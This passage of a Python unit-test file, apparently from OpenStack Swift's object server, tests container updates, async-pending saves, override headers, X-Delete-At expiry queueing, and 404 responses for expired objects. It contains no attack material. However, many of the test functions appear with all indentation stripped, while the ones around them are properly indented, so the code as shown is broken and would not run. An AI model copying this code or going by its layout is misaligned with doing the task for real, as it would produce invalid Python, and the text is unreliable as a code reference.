        # async_update must save the update to an async_pending file.
        policy = random.choice(list(POLICIES))
        self._stage_tmp_dir(policy)
        _prefix = utils.HASH_PATH_PREFIX
        utils.HASH_PATH_PREFIX = ''

        def fake_http_connect():

            class FakeConn(object):

                def getresponse(self):
                    # sleep far longer than the 0.001s node_timeout set
                    # below, so the update path hits its timeout
                    return sleep(1)

            return lambda *args: FakeConn()

        orig_http_connect = object_server.http_connect
        try:
            for status in (200, 299):
                object_server.http_connect = fake_http_connect()
                self.object_controller.node_timeout = 0.001
                self.object_controller.async_update(
                    'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                    {'x-timestamp': '1', 'x-out': str(status)}, 'sda1',
                    policy)
                async_dir = diskfile.get_async_dir(policy)
                self.assertTrue(
                    os.path.exists(os.path.join(
                        self.testdir, 'sda1', async_dir, 'a83',
                        '06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
                        utils.Timestamp(1).internal)))
        finally:
            # restore the real connector and hash prefix no matter what
            object_server.http_connect = orig_http_connect
            utils.HASH_PATH_PREFIX = _prefix
def test_container_update_no_async_update(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0', 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
def test_container_update_success(self):
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain'}, body='')
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(container_updates), 1)
ip, port, method, path, headers = container_updates[0]
self.assertEqual(ip, 'chost')
self.assertEqual(port, 'cport')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/cdevice/cpartition/a/c/o')
self.assertEqual(headers, HeaderKeyDict({
'user-agent': 'object-server %s' % os.getpid(),
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp(1).internal,
'X-Backend-Storage-Policy-Index': '0', # default when not given
'x-trans-id': '123',
'referer': 'PUT http://localhost/sda1/0/a/c/o'}))
    def test_PUT_container_update_overrides(self):
        # Container-update override headers (both the backend/EC flavor and
        # the middleware sysmeta flavor) must replace the etag/content-type
        # reported to the container, and sysmeta overrides win over backend
        # overrides when both are present.

        def do_test(override_headers):
            container_updates = []

            def capture_updates(
                    ip, port, method, path, headers, *args, **kwargs):
                container_updates.append((ip, port, method, path, headers))

            ts_put = next(self.ts)
            headers = {
                'X-Timestamp': ts_put.internal,
                'X-Trans-Id': '123',
                'X-Container-Host': 'chost:cport',
                'X-Container-Partition': 'cpartition',
                'X-Container-Device': 'cdevice',
                'Content-Type': 'text/plain',
            }
            headers.update(override_headers)
            req = Request.blank('/sda1/0/a/c/o', method='PUT',
                                headers=headers, body='')
            with mocked_http_conn(
                    200, give_connect=capture_updates) as fake_conn:
                with fake_spawn():
                    resp = req.get_response(self.object_controller)
            self.assertRaises(StopIteration, fake_conn.code_iter.next)
            self.assertEqual(resp.status_int, 201)
            self.assertEqual(len(container_updates), 1)
            ip, port, method, path, headers = container_updates[0]
            self.assertEqual(ip, 'chost')
            self.assertEqual(port, 'cport')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/cdevice/cpartition/a/c/o')
            # the overridden etag/content-type and the extra 'foo' override
            # must appear in the update, while '*-Ignored' headers must not
            self.assertEqual(headers, HeaderKeyDict({
                'user-agent': 'object-server %s' % os.getpid(),
                'x-size': '0',
                'x-etag': 'override_etag',
                'x-content-type': 'override_val',
                'x-timestamp': ts_put.internal,
                'X-Backend-Storage-Policy-Index': '0',  # default
                'x-trans-id': '123',
                'referer': 'PUT http://localhost/sda1/0/a/c/o',
                'x-foo': 'bar'}))

        # EC policy override headers
        do_test({
            'X-Backend-Container-Update-Override-Etag': 'override_etag',
            'X-Backend-Container-Update-Override-Content-Type': 'override_val',
            'X-Backend-Container-Update-Override-Foo': 'bar',
            'X-Backend-Container-Ignored': 'ignored'})

        # middleware override headers
        do_test({
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
            'X-Object-Sysmeta-Container-Update-Override-Content-Type':
                'override_val',
            'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
            'X-Object-Sysmeta-Ignored': 'ignored'})

        # middleware override headers take precedence over EC policy headers
        do_test({
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
            'X-Object-Sysmeta-Container-Update-Override-Content-Type':
                'override_val',
            'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
            'X-Backend-Container-Update-Override-Etag': 'ignored',
            'X-Backend-Container-Update-Override-Content-Type': 'ignored',
            'X-Backend-Container-Update-Override-Foo': 'ignored'})
def test_container_update_async(self):
policy = random.choice(list(POLICIES))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain',
'X-Object-Sysmeta-Ec-Frag-Index': 0,
'X-Backend-Storage-Policy-Index': int(policy)}, body='')
given_args = []
def fake_pickle_async_update(*args):
given_args[:] = args
diskfile_mgr = self.object_controller._diskfile_router[policy]
diskfile_mgr.pickle_async_update = fake_pickle_async_update
with mocked_http_conn(500) as fake_conn, fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(given_args), 7)
(objdevice, account, container, obj, data, timestamp,
policy) = given_args
self.assertEqual(objdevice, 'sda1')
self.assertEqual(account, 'a')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
self.assertEqual(timestamp, utils.Timestamp(1).internal)
self.assertEqual(policy, policy)
self.assertEqual(data, {
'headers': HeaderKeyDict({
'X-Size': '0',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Content-Type': 'text/plain',
'X-Timestamp': utils.Timestamp(1).internal,
'X-Trans-Id': '123',
'Referer': 'PUT http://localhost/sda1/0/a/c/o',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}),
'obj': 'o',
'account': 'a',
'container': 'c',
'op': 'PUT'})
    def test_container_update_as_greenthread(self):
        # Container updates are dispatched via spawn(); capture the spawn
        # calls during the PUT, verify nothing ran inline, then replay the
        # captured functions in real greenthreads and check the resulting
        # async_update calls.
        greenthreads = []
        saved_spawn_calls = []
        called_async_update_args = []

        def local_fake_spawn(func, *a, **kw):
            saved_spawn_calls.append((func, a, kw))
            return mock.MagicMock()

        def local_fake_async_update(*a, **kw):
            # just capture the args to see that we would have called
            called_async_update_args.append([a, kw])

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': 0,
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1'})
        with mock.patch.object(object_server, 'spawn',
                               local_fake_spawn):
            with mock.patch.object(self.object_controller,
                                   'async_update',
                                   local_fake_async_update):
                resp = req.get_response(self.object_controller)
                # check the response is completed and successful
                self.assertEqual(resp.status_int, 201)
                # check that async_update hasn't been called
                self.assertFalse(len(called_async_update_args))
                # now do the work in greenthreads
                for func, a, kw in saved_spawn_calls:
                    gt = spawn(func, *a, **kw)
                    greenthreads.append(gt)
                # wait for the greenthreads to finish
                for gt in greenthreads:
                    gt.wait()
        # check that the calls to async_update have happened
        headers_out = {'X-Size': '0',
                       'X-Content-Type': 'application/burrito',
                       'X-Timestamp': '0000012345.00000',
                       'X-Trans-Id': '-',
                       'Referer': 'PUT http://localhost/sda1/p/a/c/o',
                       'X-Backend-Storage-Policy-Index': '0',
                       'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}
        expected = [('PUT', 'a', 'c', 'o', '1.2.3.4:5', '20', 'sdb1',
                     headers_out, 'sda1', POLICIES[0]),
                    {'logger_thread_locals': (None, None)}]
        self.assertEqual(called_async_update_args, [expected])
    def test_container_update_as_greenthread_with_timeout(self):
        '''
        give it one container to update (for only one greenthread)
        fake the greenthread so it will raise a timeout
        test that the right message is logged and the method returns None
        '''
        called_async_update_args = []

        def local_fake_spawn(func, *a, **kw):
            # return a mock whose wait() raises, simulating a greenthread
            # that never finishes within container_update_timeout
            m = mock.MagicMock()

            def wait_with_error():
                raise Timeout()
            m.wait = wait_with_error  # because raise can't be in a lambda
            return m

        def local_fake_async_update(*a, **kw):
            # just capture the args to see that we would have called
            called_async_update_args.append([a, kw])

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': 0,
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1'})
        with mock.patch.object(object_server, 'spawn',
                               local_fake_spawn):
            with mock.patch.object(self.object_controller,
                                   'container_update_timeout',
                                   1.414213562):
                resp = req.get_response(self.object_controller)
        # check the response is completed and successful
        self.assertEqual(resp.status_int, 201)
        # check that the timeout was logged (value rendered to 4 decimals)
        expected_logged_error = "Container update timeout (1.4142s) " \
            "waiting for [('1.2.3.4:5', 'sdb1')]"
        self.assertTrue(
            expected_logged_error in
            self.object_controller.logger.get_lines_for_level('debug'))
def test_container_update_bad_args(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost,badhost',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
errors = self.object_controller.logger.get_lines_for_level('error')
self.assertEqual(len(errors), 1)
msg = errors[0]
self.assertTrue('Container update failed' in msg)
self.assertTrue('different numbers of hosts and devices' in msg)
self.assertTrue('chost,badhost' in msg)
self.assertTrue('cdevice' in msg)
def test_delete_at_update_on_put(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.delete_at_update(
'DELETE', 2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '123',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_negative(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
# Test negative is reset to 0
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234', 'X-Backend-Storage-Policy-Index':
int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [
'DELETE', '.expiring_objects', '0000000000', '0000000000-a/c/o',
None, None, None,
HeaderKeyDict({
# the expiring objects account is always 0
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
    def test_delete_at_cap(self):
        # Test how delete_at_update works when issued a delete for old
        # expiration info after a new put with no new expiration info.
        # Test past cap is reset to cap
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        self.object_controller.delete_at_update(
            'DELETE', 12345678901, 'a', 'c', 'o', req, 'sda1', policy)
        # pop the expirer container name (3rd positional arg) out of the
        # captured args so it can be checked separately against
        # get_expirer_container, and the remainder compared wholesale below
        expiring_obj_container = given_args.pop(2)
        expected_exp_cont = utils.get_expirer_container(
            utils.normalize_delete_at_timestamp(12345678901),
            86400, 'a', 'c', 'o')
        self.assertEqual(expiring_obj_container, expected_exp_cont)

        self.assertEqual(given_args, [
            'DELETE', '.expiring_objects', '9999999999-a/c/o',
            None, None, None,
            HeaderKeyDict({
                # the expirer queue is always policy 0; the over-large
                # delete-at value is capped to 9999999999 in the obj name
                'X-Backend-Storage-Policy-Index': 0,
                'x-timestamp': utils.Timestamp('1').internal,
                'x-trans-id': '1234',
                'referer': 'PUT http://localhost/v1/a/c/o'}),
            'sda1', policy])
def test_delete_at_update_put_with_info(self):
# Keep next test,
# test_delete_at_update_put_with_info_but_missing_container, in sync
# with this one but just missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Container': '0',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'PUT', '.expiring_objects', '0000000000', '0000000002-a/c/o',
'127.0.0.1:1234',
'3', 'sdc1', HeaderKeyDict({
# the .expiring_objects account is always policy-0
'X-Backend-Storage-Policy-Index': 0,
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_update_put_with_info_but_missing_container(self):
# Same as previous test, test_delete_at_update_put_with_info, but just
# missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
self.object_controller.logger = self.logger
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
self.logger.get_lines_for_level('warning'),
['X-Delete-At-Container header must be specified for expiring '
'objects background PUT to work properly. Making best guess as '
'to the container name for now.'])
def test_delete_at_update_delete(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('DELETE', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None,
None, HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'DELETE http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_backend_replication(self):
# If X-Backend-Replication: True delete_at_update should completely
# short-circuit.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Replication': 'True',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [])
    def test_POST_calls_delete_at(self):
        # POSTs that set or change X-Delete-At must drive delete_at_update:
        # a PUT enqueuing the new expiration and, on change, a DELETE
        # removing the previous one.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_delete_at_update(*args):
            given_args.extend(args)

        self.object_controller.delete_at_update = fake_delete_at_update
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 2})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # no X-Delete-At on the PUT, so no delete_at_update calls yet
        self.assertEqual(given_args, [])

        sleep(.00001)
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Type': 'application/x-test',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # POST without X-Delete-At: still nothing enqueued
        self.assertEqual(given_args, [])

        sleep(.00001)
        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = str(int(time() + 1000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'application/x-test',
                     'X-Delete-At': delete_at_timestamp1,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # given_args[5] is the request object delete_at_update received; we
        # can't construct an equal expected value, so reference it in place
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])

        while given_args:
            given_args.pop()

        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        delete_at_timestamp2 = str(int(time() + 2000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Type': 'application/x-test',
                     'X-Delete-At': delete_at_timestamp2,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # a changed X-Delete-At enqueues a PUT for the new expiration plus a
        # DELETE for the old; both calls stem from this one POST so both
        # carry the same request object (hence given_args[5] twice)
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
                given_args[5], 'sda1', policy,
                'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])
    def test_PUT_calls_delete_at(self):
        # PUTs with X-Delete-At must drive delete_at_update: a PUT enqueuing
        # the new expiration and, on overwrite with a different value, a
        # DELETE removing the previous one.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_delete_at_update(*args):
            given_args.extend(args)

        self.object_controller.delete_at_update = fake_delete_at_update
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 4})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # no X-Delete-At on the first PUT: nothing enqueued
        self.assertEqual(given_args, [])

        sleep(.00001)
        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = str(int(time() + 1000))
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': delete_at_timestamp1,
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 3})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # given_args[5] is the request object delete_at_update received; we
        # can't construct an equal expected value, so reference it in place
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])

        while given_args:
            given_args.pop()

        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        delete_at_timestamp2 = str(int(time() + 2000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': delete_at_timestamp2,
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 3})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # overwrite with a new X-Delete-At: PUT the new entry and DELETE the
        # old; both calls stem from this one PUT, so both carry the same
        # request object (hence given_args[5] twice)
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
                given_args[5], 'sda1', policy,
                'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])
    def test_GET_but_expired(self):
        # GETs of an object past its X-Delete-At must 404 (with
        # X-Backend-Timestamp exposed), while unexpired objects serve 200.
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # well before the expiry: GET succeeds
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'X-Timestamp': normalize_timestamp(test_time)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)

        orig_time = object_server.time.time
        try:
            # freeze "now" and overwrite with an object expiring one
            # second from the frozen time; it is not yet expired
            t = time()
            object_server.time.time = lambda: t
            delete_at_timestamp = int(t + 1)
            delete_at_container = str(
                delete_at_timestamp /
                self.object_controller.expiring_objects_container_divisor *
                self.object_controller.expiring_objects_container_divisor)
            put_timestamp = normalize_timestamp(test_time - 1000)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'PUT'},
                headers={'X-Timestamp': put_timestamp,
                         'X-Delete-At': str(delete_at_timestamp),
                         'X-Delete-At-Container': delete_at_container,
                         'Content-Length': '4',
                         'Content-Type': 'application/octet-stream'})
            req.body = 'TEST'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': normalize_timestamp(test_time)})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
        finally:
            # always un-freeze the object server's clock
            object_server.time.time = orig_time

        orig_time = object_server.time.time
        try:
            # advance "now" past the expiry: GET must 404 but still expose
            # the backend timestamp of the expired object
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': normalize_timestamp(t)})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            self.assertEqual(resp.headers['X-Backend-Timestamp'],
                             utils.Timestamp(put_timestamp))
        finally:
            object_server.time.time = orig_time
    def test_HEAD_but_expired(self):
        """HEAD 404s once the object's X-Delete-At time has passed, while
        still reporting X-Backend-Timestamp for the expired data."""
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        # integer division floors the timestamp down to its
        # expiring-objects container boundary
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # not yet expired: HEAD succeeds
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'HEAD'},
            headers={'X-Timestamp': normalize_timestamp(test_time)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        orig_time = object_server.time.time
        try:
            # freeze the server clock and overwrite with an X-Delete-At
            # only one second in the future
            t = time()
            delete_at_timestamp = int(t + 1)
            delete_at_container = str(
                delete_at_timestamp /
                self.object_controller.expiring_objects_container_divisor *
                self.object_controller.expiring_objects_container_divisor)
            object_server.time.time = lambda: t
            put_timestamp = normalize_timestamp(test_time - 1000)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'PUT'},
                headers={'X-Timestamp': put_timestamp,
                         'X-Delete-At': str(delete_at_timestamp),
                         'X-Delete-At-Container': delete_at_container,
                         'Content-Length': '4',
                         'Content-Type': 'application/octet-stream'})
            req.body = 'TEST'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'HEAD'},
                headers={'X-Timestamp': normalize_timestamp(test_time)})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
        finally:
            object_server.time.time = orig_time
        orig_time = object_server.time.time
        try:
            # advance the server clock past the delete-at time: HEAD now
            # 404s but still carries the backend timestamp of the data
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'HEAD'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            self.assertEqual(resp.headers['X-Backend-Timestamp'],
                             utils.Timestamp(put_timestamp))
        finally:
            object_server.time.time = orig_time
    def test_POST_but_expired(self):
        """POST to an object whose X-Delete-At has passed returns 404."""
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # while the object is still live a POST is accepted
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 1500)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # overwrite with an X-Delete-At only one second away
        delete_at_timestamp = int(time() + 1)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
